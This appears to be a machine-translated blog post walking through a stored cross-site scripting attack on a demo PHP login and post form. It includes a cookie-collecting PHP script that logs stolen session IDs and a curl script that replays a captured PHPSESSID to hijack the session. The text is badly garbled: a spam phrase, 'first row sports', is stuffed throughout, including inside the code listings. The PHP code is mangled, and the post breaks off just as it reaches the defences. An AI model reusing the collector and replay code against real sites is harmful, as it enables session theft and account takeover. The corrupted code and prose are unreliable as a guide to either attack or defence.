Cross-site scripting (XSS) is at the rear of the content of the attacked side code (typically JavaScript) that is displayed by another user may lead to the execution by him of adverse action. One such shares may be sent a cookie attacker.
Cookie - is a small piece of text sent by a website to the user. The cookie may be stored eg. Setting or session ID. Cookies can be taken only within the domain, or page www.przyklad123.pl cookie can not retrieve first row sports recorded first row sports by www.przyklad321.pl
It should also be about how the mechanism works in PHP session. The information stored in session variables are stored on the server side, but the session identifier is sent as a cookie. If you steal it, you can capture the user's session. An example of XSS
I create a temporary first row sports login panel yet. Logowanie.php the file is: <? Php session_start (); if (! isset ($ _ SESSION ['logged'])) {$ _SESSION ['logged'] = false; } If (isset ($ _ GET ['action'])) {if ($ _ GET ['action'] == 'logout') {$ _SESSION first row sports ['logged'] = false; session_destroy (); }} If ($ _SESSION ['logged'] === false && isset ($ _ POST ['username']) && isset ($ _ POST ['password'])) {if ($ _POST ['username'] == 'demo' && $ _POST ['password'] == 'demo') {$ _SESSION ['logged'] = true; } Else {echo '<p> Wrong password !!! </ p>'; $ _SESSION ['Logged'] = false; }}?> <! DOCTYPE html> <html xmlns = "http://www.w3.org/1999/xhtml" lang = "en"> <head> <meta charset = "utf-8"> <title> XSS - login </ title> </ head> <body> <? php if ($ _SESSION ['logged'])?> You are logged in! <a href="?action=logout"> Log me out! </a> <? php else:?> <form method = "post" action = ""> Username: <input type = "text" name = "login "/> <br/> Password: <input type =" password "name =" password "/> first row sports <br/> <input type =" submit "value =" first row sports Login "/> </ form> < ? php endif; ?> </ Body> </ html>
With the structure of the database and let the login panel to add post form. This is the post.php file: <? Php <? Php $ dbh = new PDO ('mysql: host = ****; dbname first row sports = ****', '****', '****' ); $ Dbh-> setAttribute (PDO :: ATTR_EMULATE_PREPARES, false); if (isset ($ _ POST)) {$ content = $ _POST ['content']; $ NewPost = $ dbh-> prepare ("INSERT INTO post SET content = 'content'); $ NewPost-> bindValue ("content", $ content, PDO :: PARAM_STR); $ NewPost-> execute (); }?> <Html> <head> <title> XSS </ title> </ head> <body> <form action = "" method = "post"> Text: <br/> <textarea name = "content"> </ textarea> <br/> <input type = "submit" value = "Add" /> </ form> first row sports <h4> Added posts </ h4> <ul> <? php $ posts = $ dbh-> prepare ( "SELECT * from post ORDER by id DESC"); $ Posts-> first row sports execute (); foreach ($ posts-> fetchAll () as $ post) {echo '<li>'. $ post ['content']. '</ li>'; }?> </ Ul> </ body> </ html>
In this file are executed two shares: adding a post to the database and displays all the posts from the database. Note that record to the database is protected against SQL injection. Let's see what happens when I type in the text box JavaScript code displays the alert.
In the above example is more sophisticated code. Inject to the image, which sends the GET method cookie that domain. I use here the fact that the images are loaded automatically.
The malicious code is injected into the site. It's time now to receive data :) For me it is a obrazek.php file: <? Php if (isset ($ _ GET ['cookies'])) {file_put_contents ('cookies_data.txt', date ('Ymd H: i') . '-'. $ _ GET ['cookies']. "\ n", FILE_APPEND | LOCK_EX); }; header ('Content-type: image / gif ");
This is a very simple script. Simply I write down the data from the $ _GET array along with the date the file cookies_data.txt. You can save data in other ways - for example, to send information to the mail. At the end I set the header image. You can also display a picture to hide our intentions more.
For this purpose, I create a script using the Curl library, first row sports which connects to the login panel and sends a cookie captured session identifier. Curl.php file: <? Php $ addr = 'http://lukasz-socha.pl/przyklady/xss/logowanie.php'; $ Connect = curl_init (); curl_setopt ($ connect, CURLOPT_URL, $ addr); curl_setopt ($ connect, CURLOPT_COOKIE, "PHPSESSID = 2f59021b60788fda60f5ee3f5fd374a8"); $ Result first row sports = curl_exec ($ connect); first row sports curl_close ($ connect); echo $ result;
Zabespieczenia way against XSS is fairly easy - before displaying data zb
No comments:
Post a Comment